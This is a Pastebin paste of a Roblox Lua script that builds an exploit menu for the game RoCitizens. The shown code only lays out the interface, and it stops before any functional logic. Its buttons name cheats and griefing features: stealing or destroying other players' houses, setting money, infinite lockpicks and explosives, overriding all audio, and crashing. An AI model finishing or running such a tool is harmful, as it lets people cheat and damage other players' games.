Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- local Obj = nil
- local Succ = pcall(function()
- local RoCitizens = Instance.new("ScreenGui")
- local Main = Instance.new("Frame")
- local Title = Instance.new("TextLabel")
- local MadeBy = Instance.new("TextLabel")
- local Functions = Instance.new("Frame")
- local Func5 = Instance.new("Frame")
- local DestroyLbl = Instance.new("TextLabel")
- local DestroyBut = Instance.new("TextButton")
- local Func4 = Instance.new("Frame")
- local TeleportLbl = Instance.new("TextLabel")
- local Teleport = Instance.new("TextButton")
- local Func3 = Instance.new("Frame")
- local TeleportLbl_2 = Instance.new("TextLabel")
- local Teleport_2 = Instance.new("TextButton")
- local Func2 = Instance.new("Frame")
- local MoneyBox = Instance.new("TextBox")
- local SendMoney = Instance.new("TextButton")
- local SetMoneyLbl = Instance.new("TextLabel")
- local Func1 = Instance.new("Frame")
- local MoneyBox_2 = Instance.new("TextBox")
- local SetMoney = Instance.new("TextButton")
- local SetMoneyLbl_2 = Instance.new("TextLabel")
- local Func7 = Instance.new("Frame")
- local PermsLbl = Instance.new("TextLabel")
- local Permissions = Instance.new("TextButton")
- local Func6 = Instance.new("Frame")
- local AudioChange = Instance.new("TextLabel")
- local Change = Instance.new("TextButton")
- local AudioBox = Instance.new("TextBox")
- local Func8 = Instance.new("Frame")
- local LockpickLbl = Instance.new("TextLabel")
- local Lockpick = Instance.new("TextButton")
- local Func9 = Instance.new("Frame")
- local ExplosivesLbl = Instance.new("TextLabel")
- local Explosives = Instance.new("TextButton")
- local Func10 = Instance.new("Frame")
- local Clothing = Instance.new("TextLabel")
- local Clothes = Instance.new("TextButton")
- local Func11 = Instance.new("Frame")
- local FurnitureLbl = Instance.new("TextLabel")
- local Furniture = Instance.new("TextButton")
- local Func12 = Instance.new("Frame")
- local House = Instance.new("TextLabel")
- local HouseSave = Instance.new("TextButton")
- local HouseName = Instance.new("TextBox")
- local Func16 = Instance.new("Frame")
- local Anti = Instance.new("TextLabel")
- local AntiD = Instance.new("TextButton")
- local Func13 = Instance.new("Frame")
- local House_2 = Instance.new("TextLabel")
- local HouseLoad = Instance.new("TextButton")
- local HouseName_2 = Instance.new("TextBox")
- local Func14 = Instance.new("Frame")
- local Signs = Instance.new("TextLabel")
- local SignsB = Instance.new("TextButton")
- local SignsText = Instance.new("TextBox")
- local Func15 = Instance.new("Frame")
- local Crash = Instance.new("TextLabel")
- local CrashB = Instance.new("TextButton")
- local Players = Instance.new("Frame")
- local Title_2 = Instance.new("TextLabel")
- local Players_2 = Instance.new("Frame")
- local AllPlayers = Instance.new("TextButton")
- local PlayerBOX = Instance.new("TextBox")
- --Properties:
- RoCitizens.Name = "RoCitizens"
- RoCitizens.Parent = game.Workspace.Players.PlayerGui
- Main.Name = "Main"
- Main.Parent = RoCitizens
- Main.Active = true
- Main.BackgroundColor3 = Color3.new(0.333333, 0.666667, 1)
- Main.BorderSizePixel = 0
- Main.Draggable = true
- Main.Position = UDim2.new(0.100000001, 0, 0.100000001, 0)
- Main.Selectable = true
- Main.Size = UDim2.new(0, 300, 0, 550)
- Title.Name = "Title"
- Title.Parent = Main
- Title.BackgroundColor3 = Color3.new(1, 1, 1)
- Title.BackgroundTransparency = 1
- Title.Size = UDim2.new(1, 0, 0, 30)
- Title.Font = Enum.Font.Bodoni
- Title.Text = "RoCitizens GUI"
- Title.TextColor3 = Color3.new(0, 0, 0)
- Title.TextSize = 20
- Title.TextStrokeColor3 = Color3.new(1, 1, 1)
- Title.TextStrokeTransparency = 0.69999998807907
- MadeBy.Name = "MadeBy"
- MadeBy.Parent = Main
- MadeBy.BackgroundColor3 = Color3.new(1, 1, 1)
- MadeBy.BackgroundTransparency = 1
- MadeBy.Position = UDim2.new(0, 0, 0, 35)
- MadeBy.Size = UDim2.new(1, 0, 0, 30)
- MadeBy.Font = Enum.Font.Bodoni
- MadeBy.Text = "Made by: FalconPunch @v3rmillion"
- MadeBy.TextColor3 = Color3.new(0, 0, 0)
- MadeBy.TextSize = 20
- MadeBy.TextStrokeColor3 = Color3.new(1, 1, 1)
- MadeBy.TextStrokeTransparency = 0.69999998807907
- Functions.Name = "Functions"
- Functions.Parent = Main
- Functions.Active = true
- Functions.BackgroundColor3 = Color3.new(1, 1, 1)
- Functions.BackgroundTransparency = 1
- Functions.BorderSizePixel = 0
- Functions.Position = UDim2.new(0, 0, 0, 70)
- Functions.Selectable = true
- Functions.Size = UDim2.new(1, 0, 1, -70)
- Func5.Name = "Func5"
- Func5.Parent = Functions
- Func5.BackgroundColor3 = Color3.new(1, 1, 1)
- Func5.BackgroundTransparency = 1
- Func5.Position = UDim2.new(0, 0, 0, 120)
- Func5.Size = UDim2.new(1, 0, 0, 25)
- DestroyLbl.Name = "DestroyLbl"
- DestroyLbl.Parent = Func5
- DestroyLbl.BackgroundColor3 = Color3.new(1, 1, 1)
- DestroyLbl.BackgroundTransparency = 1
- DestroyLbl.Position = UDim2.new(0, 3, 0, 0)
- DestroyLbl.Size = UDim2.new(0, 200, 0, 25)
- DestroyLbl.Font = Enum.Font.Bodoni
- DestroyLbl.Text = "Destroy Selected Player's House"
- DestroyLbl.TextColor3 = Color3.new(0, 0, 0)
- DestroyLbl.TextSize = 15
- DestroyLbl.TextStrokeColor3 = Color3.new(1, 1, 1)
- DestroyLbl.TextStrokeTransparency = 0.69999998807907
- DestroyLbl.TextWrapped = true
- DestroyLbl.TextXAlignment = Enum.TextXAlignment.Left
- DestroyBut.Name = "DestroyBut"
- DestroyBut.Parent = Func5
- DestroyBut.BackgroundColor3 = Color3.new(1, 1, 1)
- DestroyBut.Position = UDim2.new(0, 200, 0, 0)
- DestroyBut.Size = UDim2.new(0.300000012, 0, 0, 25)
- DestroyBut.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
- DestroyBut.Font = Enum.Font.ArialBold
- DestroyBut.Text = "Destroy"
- DestroyBut.TextColor3 = Color3.new(1, 1, 1)
- DestroyBut.TextSize = 14
- DestroyBut.TextStrokeTransparency = 0
- Func4.Name = "Func4"
- Func4.Parent = Functions
- Func4.BackgroundColor3 = Color3.new(1, 1, 1)
- Func4.BackgroundTransparency = 1
- Func4.Position = UDim2.new(0, 0, 0, 90)
- Func4.Size = UDim2.new(1, 0, 0, 25)
- TeleportLbl.Name = "TeleportLbl"
- TeleportLbl.Parent = Func4
- TeleportLbl.BackgroundColor3 = Color3.new(1, 1, 1)
- TeleportLbl.BackgroundTransparency = 1
- TeleportLbl.Position = UDim2.new(0, 3, 0, 0)
- TeleportLbl.Size = UDim2.new(0, 200, 0, 25)
- TeleportLbl.Font = Enum.Font.Bodoni
- TeleportLbl.Text = "Steal Selected Player's House"
- TeleportLbl.TextColor3 = Color3.new(0, 0, 0)
- TeleportLbl.TextSize = 17
- TeleportLbl.TextStrokeColor3 = Color3.new(1, 1, 1)
- TeleportLbl.TextStrokeTransparency = 0.69999998807907
- TeleportLbl.TextWrapped = true
- TeleportLbl.TextXAlignment = Enum.TextXAlignment.Left
- Teleport.Name = "Teleport"
- Teleport.Parent = Func4
- Teleport.BackgroundColor3 = Color3.new(1, 1, 1)
- Teleport.Position = UDim2.new(0, 200, 0, 0)
- Teleport.Size = UDim2.new(0.300000012, 0, 0, 25)
- Teleport.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
- Teleport.Font = Enum.Font.ArialBold
- Teleport.Text = "Steal"
- Teleport.TextColor3 = Color3.new(1, 1, 1)
- Teleport.TextSize = 14
- Teleport.TextStrokeTransparency = 0
- Func3.Name = "Func3"
- Func3.Parent = Functions
- Func3.BackgroundColor3 = Color3.new(1, 1, 1)
- Func3.BackgroundTransparency = 1
- Func3.Position = UDim2.new(0, 0, 0, 60)
- Func3.Size = UDim2.new(1, 0, 0, 25)
- TeleportLbl_2.Name = "TeleportLbl"
- TeleportLbl_2.Parent = Func3
- TeleportLbl_2.BackgroundColor3 = Color3.new(1, 1, 1)
- TeleportLbl_2.BackgroundTransparency = 1
- TeleportLbl_2.Position = UDim2.new(0, 3, 0, 0)
- TeleportLbl_2.Size = UDim2.new(0, 200, 0, 25)
- TeleportLbl_2.Font = Enum.Font.Bodoni
- TeleportLbl_2.Text = "Teleport to Selected Player"
- TeleportLbl_2.TextColor3 = Color3.new(0, 0, 0)
- TeleportLbl_2.TextSize = 17
- TeleportLbl_2.TextStrokeColor3 = Color3.new(1, 1, 1)
- TeleportLbl_2.TextStrokeTransparency = 0.69999998807907
- TeleportLbl_2.TextWrapped = true
- TeleportLbl_2.TextXAlignment = Enum.TextXAlignment.Left
- Teleport_2.Name = "Teleport"
- Teleport_2.Parent = Func3
- Teleport_2.BackgroundColor3 = Color3.new(1, 1, 1)
- Teleport_2.Position = UDim2.new(0, 185, 0, 0)
- Teleport_2.Size = UDim2.new(0.349999994, 0, 0, 25)
- Teleport_2.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
- Teleport_2.Font = Enum.Font.ArialBold
- Teleport_2.Text = "Teleport"
- Teleport_2.TextColor3 = Color3.new(1, 1, 1)
- Teleport_2.TextSize = 14
- Teleport_2.TextStrokeTransparency = 0
- Func2.Name = "Func2"
- Func2.Parent = Functions
- Func2.BackgroundColor3 = Color3.new(1, 1, 1)
- Func2.BackgroundTransparency = 1
- Func2.Position = UDim2.new(0, 0, 0, 30)
- Func2.Size = UDim2.new(1, 0, 0, 25)
- MoneyBox.Name = "MoneyBox"
- MoneyBox.Parent = Func2
- MoneyBox.BackgroundColor3 = Color3.new(0.282353, 0.584314, 0.862745)
- MoneyBox.BorderColor3 = Color3.new(0, 0, 0)
- MoneyBox.Position = UDim2.new(0, 95, 0, 0)
- MoneyBox.Size = UDim2.new(0, 125, 0, 25)
- MoneyBox.Font = Enum.Font.Arial
- MoneyBox.Text = "$2,147,483,647"
- MoneyBox.TextColor3 = Color3.new(1, 1, 1)
- MoneyBox.TextSize = 17
- MoneyBox.TextStrokeTransparency = 0
- SendMoney.Name = "SendMoney"
- SendMoney.Parent = Func2
- SendMoney.BackgroundColor3 = Color3.new(1, 1, 1)
- SendMoney.Position = UDim2.new(0, 225, 0, 0)
- SendMoney.Size = UDim2.new(0, 73, 0, 25)
- SendMoney.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
- SendMoney.Font = Enum.Font.ArialBold
- SendMoney.Text = "Send"
- SendMoney.TextColor3 = Color3.new(1, 1, 1)
- SendMoney.TextSize = 14
- SendMoney.TextStrokeTransparency = 0
- SetMoneyLbl.Name = "SetMoneyLbl"
- SetMoneyLbl.Parent = Func2
- SetMoneyLbl.BackgroundColor3 = Color3.new(1, 1, 1)
- SetMoneyLbl.BackgroundTransparency = 1
- SetMoneyLbl.Position = UDim2.new(0, 3, 0, 0)
- SetMoneyLbl.Size = UDim2.new(0, 200, 0, 25)
- SetMoneyLbl.Font = Enum.Font.Bodoni
- SetMoneyLbl.Text = "Send Money:"
- SetMoneyLbl.TextColor3 = Color3.new(0, 0, 0)
- SetMoneyLbl.TextSize = 17
- SetMoneyLbl.TextStrokeColor3 = Color3.new(1, 1, 1)
- SetMoneyLbl.TextStrokeTransparency = 0.69999998807907
- SetMoneyLbl.TextWrapped = true
- SetMoneyLbl.TextXAlignment = Enum.TextXAlignment.Left
- Func1.Name = "Func1"
- Func1.Parent = Functions
- Func1.BackgroundColor3 = Color3.new(1, 1, 1)
- Func1.BackgroundTransparency = 1
- Func1.Size = UDim2.new(1, 0, 0, 25)
- MoneyBox_2.Name = "MoneyBox"
- MoneyBox_2.Parent = Func1
- MoneyBox_2.BackgroundColor3 = Color3.new(0.282353, 0.584314, 0.862745)
- MoneyBox_2.BorderColor3 = Color3.new(0, 0, 0)
- MoneyBox_2.Position = UDim2.new(0, 85, 0, 0)
- MoneyBox_2.Size = UDim2.new(0, 125, 0, 25)
- MoneyBox_2.Font = Enum.Font.Arial
- MoneyBox_2.Text = "$2,147,483,647"
- MoneyBox_2.TextColor3 = Color3.new(1, 1, 1)
- MoneyBox_2.TextSize = 17
- MoneyBox_2.TextStrokeTransparency = 0
- SetMoney.Name = "SetMoney"
- SetMoney.Parent = Func1
- SetMoney.BackgroundColor3 = Color3.new(1, 1, 1)
- SetMoney.Position = UDim2.new(0, 215, 0, 0)
- SetMoney.Size = UDim2.new(0, 75, 0, 25)
- SetMoney.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
- SetMoney.Font = Enum.Font.ArialBold
- SetMoney.Text = "Set"
- SetMoney.TextColor3 = Color3.new(1, 1, 1)
- SetMoney.TextSize = 14
- SetMoney.TextStrokeTransparency = 0
- SetMoneyLbl_2.Name = "SetMoneyLbl"
- SetMoneyLbl_2.Parent = Func1
- SetMoneyLbl_2.BackgroundColor3 = Color3.new(1, 1, 1)
- SetMoneyLbl_2.BackgroundTransparency = 1
- SetMoneyLbl_2.Position = UDim2.new(0, 3, 0, 0)
- SetMoneyLbl_2.Size = UDim2.new(0, 200, 0, 25)
- SetMoneyLbl_2.Font = Enum.Font.Bodoni
- SetMoneyLbl_2.Text = "Set Money:"
- SetMoneyLbl_2.TextColor3 = Color3.new(0, 0, 0)
- SetMoneyLbl_2.TextSize = 17
- SetMoneyLbl_2.TextStrokeColor3 = Color3.new(1, 1, 1)
- SetMoneyLbl_2.TextStrokeTransparency = 0.69999998807907
- SetMoneyLbl_2.TextWrapped = true
- SetMoneyLbl_2.TextXAlignment = Enum.TextXAlignment.Left
- Func7.Name = "Func7"
- Func7.Parent = Functions
- Func7.BackgroundColor3 = Color3.new(1, 1, 1)
- Func7.BackgroundTransparency = 1
- Func7.Position = UDim2.new(0, 0, 0, 180)
- Func7.Size = UDim2.new(1, 0, 0, 25)
- PermsLbl.Name = "PermsLbl"
- PermsLbl.Parent = Func7
- PermsLbl.BackgroundColor3 = Color3.new(1, 1, 1)
- PermsLbl.BackgroundTransparency = 1
- PermsLbl.Position = UDim2.new(0, 3, 0, 0)
- PermsLbl.Size = UDim2.new(0, 200, 0, 25)
- PermsLbl.Font = Enum.Font.Bodoni
- PermsLbl.Text = "House Permissions"
- PermsLbl.TextColor3 = Color3.new(0, 0, 0)
- PermsLbl.TextSize = 17
- PermsLbl.TextStrokeColor3 = Color3.new(1, 1, 1)
- PermsLbl.TextStrokeTransparency = 0.69999998807907
- PermsLbl.TextWrapped = true
- PermsLbl.TextXAlignment = Enum.TextXAlignment.Left
- Permissions.Name = "Permissions"
- Permissions.Parent = Func7
- Permissions.BackgroundColor3 = Color3.new(1, 1, 1)
- Permissions.Position = UDim2.new(0, 135, 0, 0)
- Permissions.Size = UDim2.new(0.519999981, 0, 0, 25)
- Permissions.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
- Permissions.Font = Enum.Font.ArialBold
- Permissions.Text = "OFF"
- Permissions.TextColor3 = Color3.new(1, 0, 0)
- Permissions.TextSize = 14
- Permissions.TextStrokeTransparency = 0.5
- Func6.Name = "Func6"
- Func6.Parent = Functions
- Func6.BackgroundColor3 = Color3.new(1, 1, 1)
- Func6.BackgroundTransparency = 1
- Func6.Position = UDim2.new(0, 0, 0, 150)
- Func6.Size = UDim2.new(1, 0, 0, 25)
- AudioChange.Name = "AudioChange"
- AudioChange.Parent = Func6
- AudioChange.BackgroundColor3 = Color3.new(1, 1, 1)
- AudioChange.BackgroundTransparency = 1
- AudioChange.Position = UDim2.new(0, 3, 0, 0)
- AudioChange.Size = UDim2.new(0, 200, 0, 25)
- AudioChange.Font = Enum.Font.Bodoni
- AudioChange.Text = "Change All Audio"
- AudioChange.TextColor3 = Color3.new(0, 0, 0)
- AudioChange.TextSize = 17
- AudioChange.TextStrokeColor3 = Color3.new(1, 1, 1)
- AudioChange.TextStrokeTransparency = 0.69999998807907
- AudioChange.TextWrapped = true
- AudioChange.TextXAlignment = Enum.TextXAlignment.Left
- Change.Name = "Change"
- Change.Parent = Func6
- Change.BackgroundColor3 = Color3.new(1, 1, 1)
- Change.Position = UDim2.new(0, 215, 0, 0)
- Change.Size = UDim2.new(0.25, 0, 0, 25)
- Change.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
- Change.Font = Enum.Font.ArialBold
- Change.Text = "Change"
- Change.TextColor3 = Color3.new(1, 1, 1)
- Change.TextSize = 14
- Change.TextStrokeTransparency = 0
- AudioBox.Name = "AudioBox"
- AudioBox.Parent = Func6
- AudioBox.BackgroundColor3 = Color3.new(0.282353, 0.584314, 0.862745)
- AudioBox.BorderColor3 = Color3.new(0, 0, 0)
- AudioBox.Position = UDim2.new(0, 120, 0, 0)
- AudioBox.Size = UDim2.new(0, 90, 0, 25)
- AudioBox.Font = Enum.Font.Arial
- AudioBox.Text = "856173428"
- AudioBox.TextColor3 = Color3.new(1, 1, 1)
- AudioBox.TextSize = 17
- AudioBox.TextStrokeTransparency = 0
- Func8.Name = "Func8"
- Func8.Parent = Functions
- Func8.BackgroundColor3 = Color3.new(1, 1, 1)
- Func8.BackgroundTransparency = 1
- Func8.Position = UDim2.new(0, 0, 0, 210)
- Func8.Size = UDim2.new(1, 0, 0, 25)
- LockpickLbl.Name = "LockpickLbl"
- LockpickLbl.Parent = Func8
- LockpickLbl.BackgroundColor3 = Color3.new(1, 1, 1)
- LockpickLbl.BackgroundTransparency = 1
- LockpickLbl.Position = UDim2.new(0, 3, 0, 0)
- LockpickLbl.Size = UDim2.new(0, 200, 0, 25)
- LockpickLbl.Font = Enum.Font.Bodoni
- LockpickLbl.Text = "Infinite Lockpicks"
- LockpickLbl.TextColor3 = Color3.new(0, 0, 0)
- LockpickLbl.TextSize = 17
- LockpickLbl.TextStrokeColor3 = Color3.new(1, 1, 1)
- LockpickLbl.TextStrokeTransparency = 0.69999998807907
- LockpickLbl.TextWrapped = true
- LockpickLbl.TextXAlignment = Enum.TextXAlignment.Left
- Lockpick.Name = "Lockpick"
- Lockpick.Parent = Func8
- Lockpick.BackgroundColor3 = Color3.new(1, 1, 1)
- Lockpick.Position = UDim2.new(0, 135, 0, 0)
- Lockpick.Size = UDim2.new(0.519999981, 0, 0, 25)
- Lockpick.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
- Lockpick.Font = Enum.Font.ArialBold
- Lockpick.Text = "OFF"
- Lockpick.TextColor3 = Color3.new(1, 0, 0)
- Lockpick.TextSize = 14
- Lockpick.TextStrokeTransparency = 0.5
- Func9.Name = "Func9"
- Func9.Parent = Functions
- Func9.BackgroundColor3 = Color3.new(1, 1, 1)
- Func9.BackgroundTransparency = 1
- Func9.Position = UDim2.new(0, 0, 0, 240)
- Func9.Size = UDim2.new(1, 0, 0, 25)
- ExplosivesLbl.Name = "ExplosivesLbl"
- ExplosivesLbl.Parent = Func9
- ExplosivesLbl.BackgroundColor3 = Color3.new(1, 1, 1)
- ExplosivesLbl.BackgroundTransparency = 1
- ExplosivesLbl.Position = UDim2.new(0, 3, 0, 0)
- ExplosivesLbl.Size = UDim2.new(0, 200, 0, 25)
- ExplosivesLbl.Font = Enum.Font.Bodoni
- ExplosivesLbl.Text = "Infinite Explosives"
- ExplosivesLbl.TextColor3 = Color3.new(0, 0, 0)
- ExplosivesLbl.TextSize = 17
- ExplosivesLbl.TextStrokeColor3 = Color3.new(1, 1, 1)
- ExplosivesLbl.TextStrokeTransparency = 0.69999998807907
- ExplosivesLbl.TextWrapped = true
- ExplosivesLbl.TextXAlignment = Enum.TextXAlignment.Left
- Explosives.Name = "Explosives"
- Explosives.Parent = Func9
- Explosives.BackgroundColor3 = Color3.new(1, 1, 1)
- Explosives.Position = UDim2.new(0, 135, 0, 0)
- Explosives.Size = UDim2.new(0.519999981, 0, 0, 25)
- Explosives.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
- Explosives.Font = Enum.Font.ArialBold
- Explosives.Text = "OFF"
- Explosives.TextColor3 = Color3.new(1, 0, 0)
- Explosives.TextSize = 14
- Explosives.TextStrokeTransparency = 0.5
- Func10.Name = "Func10"
- Func10.Parent = Functions
- Func10.BackgroundColor3 = Color3.new(1, 1, 1)
- Func10.BackgroundTransparency = 1
- Func10.Position = UDim2.new(0, 0, 0, 270)
- Func10.Size = UDim2.new(1, 0, 0, 25)
- Clothing.Name = "Clothing"
- Clothing.Parent = Func10
- Clothing.BackgroundColor3 = Color3.new(1, 1, 1)
- Clothing.BackgroundTransparency = 1
- Clothing.Position = UDim2.new(0, 3, 0, 0)
- Clothing.Size = UDim2.new(0, 200, 0, 25)
- Clothing.Font = Enum.Font.Bodoni
- Clothing.Text = "Add All Clothing"
- Clothing.TextColor3 = Color3.new(0, 0, 0)
- Clothing.TextSize = 17
- Clothing.TextStrokeColor3 = Color3.new(1, 1, 1)
- Clothing.TextStrokeTransparency = 0.69999998807907
- Clothing.TextWrapped = true
- Clothing.TextXAlignment = Enum.TextXAlignment.Left
- Clothes.Name = "Clothes"
- Clothes.Parent = Func10
- Clothes.BackgroundColor3 = Color3.new(1, 1, 1)
- Clothes.Position = UDim2.new(0, 135, 0, 0)
- Clothes.Size = UDim2.new(0.519999981, 0, 0, 25)
- Clothes.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
- Clothes.Font = Enum.Font.ArialBold
- Clothes.Text = "Add"
- Clothes.TextColor3 = Color3.new(1, 1, 1)
- Clothes.TextSize = 14
- Clothes.TextStrokeTransparency = 0
- Func11.Name = "Func11"
- Func11.Parent = Functions
- Func11.BackgroundColor3 = Color3.new(1, 1, 1)
- Func11.BackgroundTransparency = 1
- Func11.Position = UDim2.new(0, 0, 0, 300)
- Func11.Size = UDim2.new(1, 0, 0, 25)
- FurnitureLbl.Name = "FurnitureLbl"
- FurnitureLbl.Parent = Func11
- FurnitureLbl.BackgroundColor3 = Color3.new(1, 1, 1)
- FurnitureLbl.BackgroundTransparency = 1
- FurnitureLbl.Position = UDim2.new(0, 3, 0, 0)
- FurnitureLbl.Size = UDim2.new(0, 200, 0, 25)
- FurnitureLbl.Font = Enum.Font.Bodoni
- FurnitureLbl.Text = "Add All Furniture"
- FurnitureLbl.TextColor3 = Color3.new(0, 0, 0)
- FurnitureLbl.TextSize = 17
- FurnitureLbl.TextStrokeColor3 = Color3.new(1, 1, 1)
- FurnitureLbl.TextStrokeTransparency = 0.69999998807907
- FurnitureLbl.TextWrapped = true
- FurnitureLbl.TextXAlignment = Enum.TextXAlignment.Left
- Furniture.Name = "Furniture"
- Furniture.Parent = Func11
- Furniture.BackgroundColor3 = Color3.new(1, 1, 1)
- Furniture.Position = UDim2.new(0, 135, 0, 0)
- Furniture.Size = UDim2.new(0.519999981, 0, 0, 25)
- Furniture.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
- Furniture.Font = Enum.Font.ArialBold
- Furniture.Text = "Add"
- Furniture.TextColor3 = Color3.new(1, 1, 1)
- Furniture.TextSize = 14
- Furniture.TextStrokeTransparency = 0
- Func12.Name = "Func12"
- Func12.Parent = Functions
- Func12.BackgroundColor3 = Color3.new(1, 1, 1)
- Func12.BackgroundTransparency = 1
- Func12.Position = UDim2.new(0, 0, 0, 330)
- Func12.Size = UDim2.new(1, 0, 0, 25)
- House.Name = "House"
- House.Parent = Func12
- House.BackgroundColor3 = Color3.new(1, 1, 1)
- House.BackgroundTransparency = 1
- House.Position = UDim2.new(0, 3, 0, 0)
- House.Size = UDim2.new(0, 200, 0, 25)
- House.Font = Enum.Font.Bodoni
- House.Text = "Save House:"
- House.TextColor3 = Color3.new(0, 0, 0)
- House.TextSize = 17
- House.TextStrokeColor3 = Color3.new(1, 1, 1)
- House.TextStrokeTransparency = 0.69999998807907
- House.TextWrapped = true
- House.TextXAlignment = Enum.TextXAlignment.Left
- HouseSave.Name = "HouseSave"
- HouseSave.Parent = Func12
- HouseSave.BackgroundColor3 = Color3.new(1, 1, 1)
- HouseSave.Position = UDim2.new(0, 215, 0, 0)
- HouseSave.Size = UDim2.new(0.25, 0, 0, 25)
- HouseSave.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
- HouseSave.Font = Enum.Font.ArialBold
- HouseSave.Text = "Save"
- HouseSave.TextColor3 = Color3.new(1, 1, 1)
- HouseSave.TextSize = 14
- HouseSave.TextStrokeTransparency = 0
- HouseName.Name = "HouseName"
- HouseName.Parent = Func12
- HouseName.BackgroundColor3 = Color3.new(0.282353, 0.584314, 0.862745)
- HouseName.BorderColor3 = Color3.new(0, 0, 0)
- HouseName.Position = UDim2.new(0, 90, 0, 0)
- HouseName.Size = UDim2.new(0, 120, 0, 25)
- HouseName.Font = Enum.Font.Arial
- HouseName.Text = "House 1"
- HouseName.TextColor3 = Color3.new(1, 1, 1)
- HouseName.TextSize = 17
- HouseName.TextStrokeTransparency = 0
- Func16.Name = "Func16"
- Func16.Parent = Functions
- Func16.BackgroundColor3 = Color3.new(1, 1, 1)
- Func16.BackgroundTransparency = 1
- Func16.Position = UDim2.new(0, 0, 0, 450)
- Func16.Size = UDim2.new(1, 0, 0, 25)
- Anti.Name = "Anti"
- Anti.Parent = Func16
- Anti.BackgroundColor3 = Color3.new(1, 1, 1)
- Anti.BackgroundTransparency = 1
- Anti.Position = UDim2.new(0, 3, 0, 0)
- Anti.Size = UDim2.new(0, 200, 0, 25)
- Anti.Font = Enum.Font.Bodoni
- Anti.Text = "Anti - House Destroy"
- Anti.TextColor3 = Color3.new(0, 0, 0)
- Anti.TextSize = 17
- Anti.TextStrokeColor3 = Color3.new(1, 1, 1)
- Anti.TextStrokeTransparency = 0.69999998807907
- Anti.TextWrapped = true
- Anti.TextXAlignment = Enum.TextXAlignment.Left
- AntiD.Name = "AntiD"
- AntiD.Parent = Func16
- AntiD.BackgroundColor3 = Color3.new(1, 1, 1)
- AntiD.Position = UDim2.new(0, 150, 0, 0)
- AntiD.Size = UDim2.new(0.469999999, 0, 0, 25)
- AntiD.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
- AntiD.Font = Enum.Font.ArialBold
- AntiD.Text = "OFF"
- AntiD.TextColor3 = Color3.new(1, 0, 0)
- AntiD.TextSize = 14
- AntiD.TextStrokeTransparency = 0.5
- Func13.Name = "Func13"
- Func13.Parent = Functions
- Func13.BackgroundColor3 = Color3.new(1, 1, 1)
- Func13.BackgroundTransparency = 1
- Func13.Position = UDim2.new(0, 0, 0, 360)
- Func13.Size = UDim2.new(1, 0, 0, 25)
- House_2.Name = "House"
- House_2.Parent = Func13
- House_2.BackgroundColor3 = Color3.new(1, 1, 1)
- House_2.BackgroundTransparency = 1
- House_2.Position = UDim2.new(0, 3, 0, 0)
- House_2.Size = UDim2.new(0, 200, 0, 25)
- House_2.Font = Enum.Font.Bodoni
- House_2.Text = "Load House:"
- House_2.TextColor3 = Color3.new(0, 0, 0)
- House_2.TextSize = 17
- House_2.TextStrokeColor3 = Color3.new(1, 1, 1)
- House_2.TextStrokeTransparency = 0.69999998807907
- House_2.TextWrapped = true
- House_2.TextXAlignment = Enum.TextXAlignment.Left
- HouseLoad.Name = "HouseLoad"
- HouseLoad.Parent = Func13
- HouseLoad.BackgroundColor3 = Color3.new(1, 1, 1)
- HouseLoad.Position = UDim2.new(0, 215, 0, 0)
- HouseLoad.Size = UDim2.new(0.25, 0, 0, 25)
- HouseLoad.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
- HouseLoad.Font = Enum.Font.ArialBold
- HouseLoad.Text = "Load"
- HouseLoad.TextColor3 = Color3.new(1, 1, 1)
- HouseLoad.TextSize = 14
- HouseLoad.TextStrokeTransparency = 0
- HouseName_2.Name = "HouseName"
- HouseName_2.Parent = Func13
- HouseName_2.BackgroundColor3 = Color3.new(0.282353, 0.584314, 0.862745)
- HouseName_2.BorderColor3 = Color3.new(0, 0, 0)
- HouseName_2.Position = UDim2.new(0, 90, 0, 0)
- HouseName_2.Size = UDim2.new(0, 120, 0, 25)
- HouseName_2.ClearTextOnFocus = false
- HouseName_2.Font = Enum.Font.Arial
- HouseName_2.Text = "House 1"
- HouseName_2.TextColor3 = Color3.new(1, 1, 1)
- HouseName_2.TextSize = 17
- HouseName_2.TextStrokeTransparency = 0
- Func14.Name = "Func14"
- Func14.Parent = Functions
- Func14.BackgroundColor3 = Color3.new(1, 1, 1)
- Func14.BackgroundTransparency = 1
- Func14.Position = UDim2.new(0, 0, 0, 390)
- Func14.Size = UDim2.new(1, 0, 0, 25)
- Signs.Name = "Signs"
- Signs.Parent = Func14
- Signs.BackgroundColor3 = Color3.new(1, 1, 1)
- Signs.BackgroundTransparency = 1
- Signs.Position = UDim2.new(0, 3, 0, 0)
- Signs.Size = UDim2.new(0, 200, 0, 25)
- Signs.Font = Enum.Font.Bodoni
- Signs.Text = "Set Signs:"
- Signs.TextColor3 = Color3.new(0, 0, 0)
- Signs.TextSize = 17
- Signs.TextStrokeColor3 = Color3.new(1, 1, 1)
- Signs.TextStrokeTransparency = 0.69999998807907
- Signs.TextWrapped = true
- Signs.TextXAlignment = Enum.TextXAlignment.Left
- SignsB.Name = "SignsB"
- SignsB.Parent = Func14
- SignsB.BackgroundColor3 = Color3.new(1, 1, 1)
- SignsB.Position = UDim2.new(0, 215, 0, 0)
- SignsB.Size = UDim2.new(0.25, 0, 0, 25)
- SignsB.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
- SignsB.Font = Enum.Font.ArialBold
- SignsB.Text = "Set"
- SignsB.TextColor3 = Color3.new(1, 1, 1)
- SignsB.TextSize = 14
- SignsB.TextStrokeTransparency = 0
- SignsText.Name = "SignsText"
- SignsText.Parent = Func14
- SignsText.BackgroundColor3 = Color3.new(0.282353, 0.584314, 0.862745)
- SignsText.BorderColor3 = Color3.new(0, 0, 0)
- SignsText.Position = UDim2.new(0, 90, 0, 0)
- SignsText.Size = UDim2.new(0, 120, 0, 25)
- SignsText.ClearTextOnFocus = false
- SignsText.Font = Enum.Font.Arial
- SignsText.Text = "FalconPunch was here!"
- SignsText.TextColor3 = Color3.new(1, 1, 1)
